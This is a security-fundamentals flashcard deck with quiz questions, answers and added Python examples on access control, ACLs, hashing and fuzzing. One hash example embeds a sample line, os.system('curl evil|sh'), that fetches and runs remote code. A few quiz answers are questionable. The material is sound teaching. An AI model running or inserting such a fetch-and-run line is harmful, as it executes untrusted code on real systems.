Fundamentals of Information Security
GLBA
Gramm-Leach-Bliley Act (Financial Services Modernization Act of 1999). Repealed parts of a 1933 law (Glass-Steagall) that barred the consolidation of banks, securities firms and insurance companies. GLBA includes several sections on the PRIVACY of financial information: companies must give consumers written notice of their privacy rights and explain the company's procedures for safeguarding their data.
Bell-LaPadula Model
Primarily a MAC model (the original model also carries a discretionary component), concerned with the confidentiality of the resource. Two properties define how information may flow to and from the resource: the simple security property (no read up: a subject cannot read an object classified above its clearance) and the * (star) property (no write down: a subject cannot write to an object classified below its clearance).
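The two properties above, as an added example that is not part of the original deck: a minimal Bell-LaPadula checker that combines the mandatory label checks with a discretionary ACL. The level ordering, the subject "ana" and the three files are constructed for illustration.

```python
# Added example, not part of the original flashcard deck: a minimal
# Bell-LaPadula checker. Levels, subjects and objects below are hypothetical.
from dataclasses import dataclass, field

# Linear ordering of sensitivity levels (higher number = more sensitive).
LEVELS = {"public": 0, "confidential": 1, "secret": 2, "top_secret": 3}


@dataclass
class Obj:
    name: str
    level: str                              # MAC classification label
    acl: set = field(default_factory=set)   # DAC: subjects the owner allowed


def simple_security(subject_level: str, object_level: str) -> bool:
    """Simple security property ("no read up"): the subject's clearance
    must dominate the object's classification."""
    return LEVELS[subject_level] >= LEVELS[object_level]


def star_property(subject_level: str, object_level: str) -> bool:
    """*-property ("no write down"): the object's classification must
    dominate the subject's clearance, so a high subject cannot copy
    sensitive data into a lower-classified object."""
    return LEVELS[object_level] >= LEVELS[subject_level]


def allowed(subject: str, subject_level: str, obj: Obj, mode: str) -> bool:
    """An access succeeds only if BOTH the discretionary ACL and the
    mandatory property for that mode ("read" or "write") permit it."""
    if subject not in obj.acl:
        return False                        # DAC denies regardless of labels
    if mode == "read":
        return simple_security(subject_level, obj.level)
    if mode == "write":
        return star_property(subject_level, obj.level)
    raise ValueError(f"unknown mode {mode!r}")


def decision_table(subject: str, subject_level: str, objects: list) -> dict:
    """Return {(object name, mode): decision} for one subject."""
    return {(o.name, m): allowed(subject, subject_level, o, m)
            for o in objects for m in ("read", "write")}


# Constructed sample: analyst "ana" is cleared to "secret".
FILES = [
    Obj("bulletin.txt", "public", acl={"ana", "bob"}),
    Obj("plan.doc", "secret", acl={"ana"}),
    Obj("sigint.bin", "top_secret", acl={"ana"}),  # on the ACL, but above her clearance
]

if __name__ == "__main__":
    for (name, mode), ok in decision_table("ana", "secret", FILES).items():
        print(f"{name:12} {mode:5} -> {'allow' if ok else 'deny'}")
```

Note the two results that surprise people: "ana" may write to sigint.bin although she cannot read it (writing up is permitted, it leaks nothing), and she may not write to bulletin.txt although she can read it (writing down could leak secret data into a public file).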
Technical Obsolescence
A product becomes technically obsolete when it is replaced by a better product with more advanced technology.
SSH FTP (SFTP)
A file transfer protocol that runs over a Secure Shell (SSH) connection, so transfers, directory listings and file management are encrypted and authenticated by SSH. Despite the name it is a separate protocol from FTP, not FTP tunneled through SSH.
Honeypots
A seemingly tempting, but bogus target meant to draw hacking attempts. By monitoring infiltration attempts against a honeypot, organizations may gain insight into the identity of hackers and their techniques, and they can share this with partners and law enforcement.
confused deputy problem
A problem common in systems that use ACLs rather than capabilities. It arises when the software that accesses a resource (the deputy) holds more permission to that resource than the user controlling the software. If the user can trick the software into misusing its greater authority, the user can potentially carry out an attack.
Optical Media
A type of media used to store data which is read by a laser such as a CD or a DVD.
Fuzzer
A tool that bombards an application with malformed, random or unexpected inputs from a wide variety of sources in the hope of making it fail or behave in unexpected ways; the crashes it finds usually point to input-handling bugs.
Limit user account privileges.
A user runs an application that has been infected with malware that is less than 24 hours old. The malware then infects the operating system. Which safeguard should be implemented to prevent this type of attack?
Vulnerabilities
A weakness that a threat event or a threat agent can take advantage of.
Which form of access control uses CAPTCHAs? A. Attribute-based access control B. Rule-based access control C. Media access control D. Discretionary access control
A. Attribute-based access control.
What act deals with the online privacy of minors under 13? A. COPPA B. FERPA C. GLBA D. FISMA
A. COPPA
What are two common types of access control list (ACLs)? Choose two answers. A. File system B. Allow C. Network D. Deny E. Database system
A. File system C. Network
What are 3 forms of authentication? A. Four-digit PIN B. 6-digit code texted to a phone C. Phone number D. Fingerprint E. Account number F. Username
A. Four-digit PIN B. 6-digit code texted to a phone D. Fingerprint
Which type of attack category is an attack against confidentiality? A. Interception B. Modification C. Fabrication D. Interruption
A. Interception
Which two types of compliance are laws? A. Privacy Act B. GDPR C. HIPAA D. Least privilege
A. Privacy Act C. HIPAA (note that the GDPR is also binding law, as an EU regulation; only D, least privilege, is a principle rather than a law)
Which 2 attributes are included in the concept of risk? Choose 2 answers A. Threats B. Frequency C. Vulnerabilities D. Impacts
A. Threats C. Vulnerabilities
An Example of Symmetric
AES
What is an example of symmetric key encryption?
AES
Clickjacking
An attack that tricks users into clicking something other than what they think they're clicking.
SQL Injection
An attacker supplies SQL syntax in a URL parameter or form field on a company's website; if the web application builds its query by pasting that input into the SQL text, the database executes the attacker's SQL, which can allow almost anything to be done to the database (reading, altering or deleting data).
confidentiality
An organization plans to encrypt data in transit on a network. Which aspect of data is the organization attempting to protect?
Threats
Any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset.
integrity
At a small company, an employee makes an unauthorized data alteration. Which component of the CIA triad has been compromised?
Interception
Attacks that allow unauthorized users to access our data, applications, or environments; primarily an attack against confidentiality.
Interruption
Attacks that cause our assets to become unusable or unavailable for our use, on a temporary or permanent basis. Interruption attacks often affect availability but can be an attack on integrity as well.
Fabrication
Attacks that involve generating data, processes, communications, or other similar activities within a system. Fabrication attacks primarily affect integrity but could be considered an availability attack as well.
Modification
Attacks that involve tampering with our asset. Such attacks are primarily considered an integrity attack but could also represent an availability attack.
What is a sandbox? A. A tool only used in Java B. An isolated environment that protects a set of resources. C. Part of VPN connection D. A virtual location to share digital information
B. An isolated environment that protects a set of resources.
A tornado destroyed a data center. Which side of the CIA triad is most affected? A. Authenticity B. Availability C. Utility D. Integrity
B. Availability
A malicious actor has breached the firewall with a reverse shell. Which side of the CIA triad is most affected? A. Availability B. Confidentiality C. Authentication D. Integrity
B. Confidentiality
Which concept refers to adding layers of security to our networks? A. Administrative control depth B. Defense in depth. C. Physical control depth. D. Logical control depth.
B. Defense in depth.
What is an example of identification? A. Text to Cell Phone. B. Employee number C. Update access. D. Fingerprint.
B. Employee number
Which example demonstrates access control? A. Turning the key in the ignition of a car. B. Locking and unlocking the doors of your house. C. Selecting a pin for a new account. D. Changing a bank account password.
B. Locking and unlocking the doors of your house.
Which tool is used for vulnerability assessment? A. SuperScan B. Nessus C. Snort D. Wireshark
B. Nessus
Which term is synonymous with asymmetric cryptography? A. Private-Public key pair B. Public key cryptography C. Private key cryptography D. Secret key encryption algorithm
B. Public key cryptography
Which type of compliance is achieved by law? A. Security B. Regulatory C. Industry D. Privacy
B. Regulatory
Which term is synonymous with symmetric cryptography? A. Rivest-Shamir-Adleman encryption algorithm B. Secret Key cryptography C. Public key cryptography D. Private-public key pair
B. Secret Key cryptography
What is an objective for performing an audit? A. To ensure a company can respond effectively to a disaster. B. To ensure compliance and detect misuse. C. To ensure potential risks are identified and analyzed. D. To ensure proper access is granted to resources.
B. To ensure compliance and detect misuse.
Which attribute of the Parkerian hexad allows for proper attribution of the owner of a dataset? A. Possession B. Availability C. Authenticity D. Integrity
C. Authenticity
What is the final step in allowing access to resources? A. Identification B. Authentication C. Authorization D. Accountability
C. Authorization
What is an example of identification? A. Voice Pattern B. Write access C. Email Address D. Mother's Maiden Name
C. Email Address
Which method is used to protect data at rest? A. Back up to a disk B. Hashing C. Encryption D. Back up to the cloud
C. Encryption
Which standards apply to any financial entity's policies? A. PCI DSS B. ECPI C. Gramm-Leach-Bliley D. SOX
C. Gramm-Leach-Bliley
Which type of compliance is achieved by stakeholder agreement? A. Security B. Regulatory C. Industry D. Privacy
C. Industry
What is the name of the process where the client authenticates the server and the server authenticates the client? A. Token-based authentication B. Mutual authentication C. Two-factor authentication D. Multifactor authentication
C. Mutual authentication.
Which combination of factors demonstrates multifactor authentication? A. Fingerprint and voice print B. Password and Pin. C. Password and fingerprint. D. Voice print and weight.
C. Password and fingerprint.
Which phase of the incident response process includes putting the system back better than the original state? A. Post-incident activity. B. Containment. C. Recovery. D. Detection and Analysis
C. Recovery
Which element of the Parkerian hexad is concerned with usefulness? A. Integrity B. Confidentiality C. Utility D. Availability
C. Utility
Flash Drives (portable storage)
Solid-state, no moving parts; can survive harsh environments with heat, humidity and magnetic fields that would damage magnetic media.
Parkerian hexad
Confidentiality, Availability, Integrity, Possession, Authenticity, Utility
CIA Triad
Confidentiality, Integrity, Availability
Which type of system is considered absolutely secure? A. A system that is new. B. A system that has been recently patched. C. A system that has been in production for many years. D. A system that is shut off and disconnected from all networks.
D. A system that is shut off and disconnected from all networks.
Which type of access control model is a CAPTCHA an example of? A. Role-based B. Mandatory-based C. Discretionary-based D. Attribute-based
D. Attribute-based
What company audits other companies for licensing requirements? A. BASF B. RCA C. CIA D. BSA
D. BSA
What are two common values for a network access control list (ACL)? Choose two answers. A. Accept B. Agree C. Disagree D. Deny E. Allow
D. Deny E. Allow
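Allow and deny rules as they behave in practice, as an added example that is not part of the original deck: a first-match network ACL evaluator with an implicit deny at the end. The rules, addresses and packets are constructed for illustration.

```python
# Added example, not from the original deck: a first-match network ACL
# evaluator in the allow/deny style of router and cloud ACLs. Rules and
# packets below are constructed.
import ipaddress
from typing import NamedTuple, Optional


class Rule(NamedTuple):
    action: str            # "allow" or "deny"
    src: str               # source network in CIDR notation
    proto: str             # "tcp", "udp" or "any"
    dport: Optional[int]   # destination port, None = any port


class Packet(NamedTuple):
    src_ip: str
    proto: str
    dport: int


def matches(rule: Rule, pkt: Packet) -> bool:
    in_net = ipaddress.ip_address(pkt.src_ip) in ipaddress.ip_network(rule.src)
    proto_ok = rule.proto == "any" or rule.proto == pkt.proto
    port_ok = rule.dport is None or rule.dport == pkt.dport
    return in_net and proto_ok and port_ok


def evaluate(acl: list, pkt: Packet) -> str:
    """Walk the ACL top to bottom; the first matching rule decides.
    A packet that matches no rule hits the implicit deny at the end."""
    for rule in acl:
        if matches(rule, pkt):
            return rule.action
    return "deny"


# Constructed ACL: block one hostile host, let the branch office reach HTTPS,
# let the corporate LAN reach SSH, and nothing else.
ACL = [
    Rule("deny",  "203.0.113.7/32", "any", None),
    Rule("allow", "203.0.113.0/24", "tcp", 443),
    Rule("allow", "10.0.0.0/8",     "tcp", 22),
]

# Same rules with the host block placed AFTER the broader allow: the blocked
# host now gets through on 443, the classic ordering mistake.
ACL_MISORDERED = [ACL[1], ACL[0], ACL[2]]

if __name__ == "__main__":
    bad_host = Packet("203.0.113.7", "tcp", 443)
    print(evaluate(ACL, bad_host), evaluate(ACL_MISORDERED, bad_host))  # deny allow
```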
What are hash functions used for? A. Decrypting messages B. Securing messages in transport C. Discovering original content D. Determining whether the message has changed
D. Determining whether the message has changed
Which access control model allows access to be determined by the owner of the resource? A. Mandatory access control. B. Attribute based access control. C. Role based access control. D. Discretionary access control.
D. Discretionary access control.
What characteristic falls under accountability? A. Interruption B. Integrity C. Utility D. Identity
D. Identity
A user changes a number in a dataset with a typo. Which side of the CIA Triad is most affected? A. Availability B. Confidentiality C. Authentication D. Integrity
D. Integrity
Which concept of the CIA Triad is associated with reliability? A. Availability B. Confidentiality C. Authentication D. Integrity
D. Integrity (it ensures data has not been tampered with and is correct, authentic, and reliable)
What is an example of authentication? A. Username B. Write Access C. Email Address D. Mother's Maiden Name
D. Mother's Maiden Name
Which factors demonstrate multifactor authentication? A. Vein patterns and iris scan B. Username and email address C. Childhood pet and mother's maiden name D. Mother's maiden name and voice print
D. Mother's maiden name and voice print (something you know plus something you are; the other pairs use a single factor)
What is an example of authentication? A. Username. B. First car. C. Read only. D. Pin
D. Pin
What is an example of identification? A. Fingerprint B. Mothers Maiden Name C. Captcha Tests D. Username
D. Username
An organization employs a VPN to safeguard its information. Which security principle is protected by a VPN?
Confidentiality of data in motion.
Somewhere you are
Geolocation
A company developing and distributing open source applications realizes that attackers are copying the publicly available, open source code and inserting malware into the code. Which type of cryptographic tool should the company use to protect the integrity of its open source applications?
Hash functions (published digests users can recompute and compare; since an attacker who redistributes the code can publish a new hash alongside it, the digests should themselves be digitally signed)
Physical controls
A computer that has never been connected to the internet or to any corporate network; physical controls (locks, guards, restricted rooms) are what secure the software on it.
Something you have
ID badge/swipe card/OTP
Which two principles of the CIA triad can be violated by a fabrication attack?
Integrity and availability
Which two principles of the CIA triad can be violated by an interruption attack?
Integrity and availability
MD5
Message Digest 5. A hashing function used to provide integrity; it produces a 128-bit digest. A hash is a fixed-size number produced by applying the algorithm to a file or message; hashes taken at different times are compared to verify that integrity has been maintained. MD5 is collision-broken and should not be relied on for security; SHA-256 or stronger is used today.
Parkerian Hexad - Authenticity
Whether the data is genuine: it came from the claimed source and can be properly attributed to its owner or creator.
Apply the principle of least privilege
Only HR staff can access employee personal information
PCI DSS
Payment Card Industry Data Security Standard, a security standard created by the Payment Card Industry Security Standards Council (PCI SSC)
Firewall
Prevents unauthorized external access to an organization's internal network.
Which asymmetric cryptographic algorithm can provide confidentiality for data in motion?
RSA
Parkerian Hexad- confidentiality
Refers to our ability to protect our data from those who are not authorized to view it.
Which web attack is a server-side attack?
SQL injection
Which web attack is possible due to a lack of input validation?
SQL injection
SSL/TLS
Secure Sockets Layer / Transport Layer Security. A protocol that uses public key cryptography to establish an encrypted, authenticated connection; HTTPS is HTTP carried over TLS, and many other protocols use it the same way. SSL is the deprecated predecessor of TLS.
Parkerian Hexad - Availability
The ability to access our data when we need it.
Parkerian Hexad - Integrity
The ability to prevent people from changing your data in a unauthorized or undesirable manner.
Risk
The likelihood that a threat will exploit a vulnerability; risk requires both a threat and a matching vulnerability.
hash function
A keyless one-way function that maps a message of any length to a fixed-size digest. The digest is computed from the message itself, so recomputing it later and comparing it to the original shows whether the message has been changed.
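The integrity checks behind the hash function, MD5 and open-source-tampering cards above, as an added example that is not part of the original deck: detecting a modified file with a digest, showing why a bare digest fails when the attacker can also publish the hash, and a keyed check (HMAC) standing in for the digital signature a real release pipeline would use. The sample source, the trojaned copy and the key are constructed.

```python
# Added example, not from the original deck: tamper detection with a plain
# digest vs. a keyed tag. Sample data and key are constructed; HMAC stands
# in for the signature a real release would carry.
import hashlib
import hmac

SOURCE = b"def greet(name):\n    return 'hello ' + name\n"
TROJANED = (b"def greet(name):\n    import os; os.system('curl evil|sh')\n"
            b"    return 'hello ' + name\n")
SIGNING_KEY = b"demo-only-key-do-not-use"


def digest(data: bytes, algorithm: str = "sha256") -> str:
    """One-way and keyless: any change to the input changes the digest."""
    return hashlib.new(algorithm, data).hexdigest()


def verify_digest(data: bytes, published_hex: str, algorithm: str = "sha256") -> bool:
    # compare_digest avoids leaking timing when an attacker can drive the comparison
    return hmac.compare_digest(digest(data, algorithm), published_hex)


def keyed_tag(data: bytes, key: bytes) -> str:
    """HMAC-SHA256: only a holder of the key can produce a valid tag."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_keyed(data: bytes, tag_hex: str, key: bytes) -> bool:
    return hmac.compare_digest(keyed_tag(data, key), tag_hex)


def attacker_publishes(trojaned: bytes):
    """An attacker redistributing the code can recompute a plain hash for
    the modified copy, so the copy and its hash agree with each other."""
    return trojaned, digest(trojaned)


if __name__ == "__main__":
    good_hash = digest(SOURCE)
    print(verify_digest(TROJANED, good_hash))            # False: change detected
    data, fake_hash = attacker_publishes(TROJANED)
    print(verify_digest(data, fake_hash))                # True: swapped hash passes
    tag = keyed_tag(SOURCE, SIGNING_KEY)
    print(verify_keyed(TROJANED, tag, SIGNING_KEY))      # False: cannot forge without the key
    print(len(bytes.fromhex(digest(SOURCE, "md5"))))     # 16 bytes = 128-bit MD5 digest
```

The usage note for practitioners: a hash published next to the download protects only against accidental corruption; against an adversary who controls the distribution point you need the hash bound to a key the adversary lacks (a signature, or a MAC inside a trusted channel).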
Fuzzer
Which type of tool can be used to detect vulnerabilities in source code related to improper handling of user input?
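The fuzzer cards above, as an added example that is not part of the original deck: a tiny mutational and generational fuzzer run against a hypothetical binary record parser, first as written and then hardened. The record format, the seed input and the parser are constructed for illustration.

```python
# Added example, not from the original deck: a minimal fuzzer against a
# hypothetical parser. Format, seed and parsers are constructed.
import random


class MalformedRecord(ValueError):
    """The only exception a well-behaved parser should raise on bad input."""


def parse_record(data: bytes) -> dict:
    """Hypothetical wire format: 1-byte name length, ASCII name, 2-byte
    big-endian value. Written with no input checks."""
    n = data[0]
    name = data[1:1 + n].decode("ascii")
    value = int.from_bytes(data[1 + n:3 + n], "big")
    return {"name": name, "value": value}


def parse_record_hardened(data: bytes) -> dict:
    """Same format, every malformed case turned into MalformedRecord."""
    if len(data) < 1:
        raise MalformedRecord("empty record")
    n = data[0]
    if len(data) != 3 + n:
        raise MalformedRecord(f"expected {3 + n} bytes, got {len(data)}")
    try:
        name = data[1:1 + n].decode("ascii")
    except UnicodeDecodeError as exc:
        raise MalformedRecord("name is not ASCII") from exc
    value = int.from_bytes(data[1 + n:3 + n], "big")
    return {"name": name, "value": value}


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """One random mutation: flip a bit, drop a byte, or append junk."""
    data = bytearray(seed)
    choice = rng.randrange(3)
    if choice == 0 and data:
        i = rng.randrange(len(data))
        data[i] ^= 1 << rng.randrange(8)
    elif choice == 1 and data:
        del data[rng.randrange(len(data))]
    else:
        data += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 5)))
    return bytes(data)


def fuzz(target, seed: bytes, iterations: int = 2000, rng_seed: int = 1) -> list:
    """Feed mutated and purely random inputs to target; return the inputs
    that crashed it, i.e. raised anything other than MalformedRecord."""
    rng = random.Random(rng_seed)          # seeded so a run is reproducible
    crashes = []
    for i in range(iterations):
        if i % 2 == 0:
            data = mutate(seed, rng)
        else:
            data = bytes(rng.randrange(256) for _ in range(rng.randrange(0, 12)))
        try:
            target(data)
        except MalformedRecord:
            pass                           # expected rejection, not a bug
        except Exception as exc:
            crashes.append((data, type(exc).__name__))
    return crashes


SEED = bytes([3]) + b"cpu" + (42).to_bytes(2, "big")   # constructed valid record

if __name__ == "__main__":
    found = fuzz(parse_record, SEED)
    print(len(found), sorted({kind for _, kind in found}))   # e.g. IndexError, UnicodeDecodeError
    print(len(fuzz(parse_record_hardened, SEED)))            # 0
```

The fuzzer knows nothing about the bugs; it only watches for any reaction the parser was not designed to produce. That is why the hardened parser's single, deliberate exception type matters: it lets the harness separate "input rejected" from "parser lost control".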
sniffer
a type of eavesdropping program that monitors information traveling over a network
AES
Advanced Encryption Standard, a symmetric block cipher with a 128-bit block size and 128-, 192- or 256-bit keys.
After considerable research, attackers directed a spear phishing attack at employees at a single bank. One employee opened a message, resulting in a breach that delivered ransomware. Which type of control should be implemented to prevent future spear phishing attacks?
employee training
FISMA
Federal Information Security Management Act, a US law that requires federal agencies to create, document and implement an information security program.
Something you are
fingerprint, iris, retina scan
Something you do
handwriting/typing/walking
Which aspect of the CIA triad is violated by an unauthorized database roll back or undo?
integrity
Parkerian Hexad- Utility
refers to how useful the data is to us
SOX
Sarbanes-Oxley Act; regulates financial data, operations, and assets for publicly held companies.
Spear Phishing Attack
targeted attacks against specific companies, organizations or people
Which cybersecurity term is defined as the potential for an attack on a resource?
threat
Symmetric Key Encryption
Uses a single shared key to both encrypt the plaintext and decrypt the ciphertext.
Something you know
password, PIN, passphrase (a username only identifies; it is not a secret factor)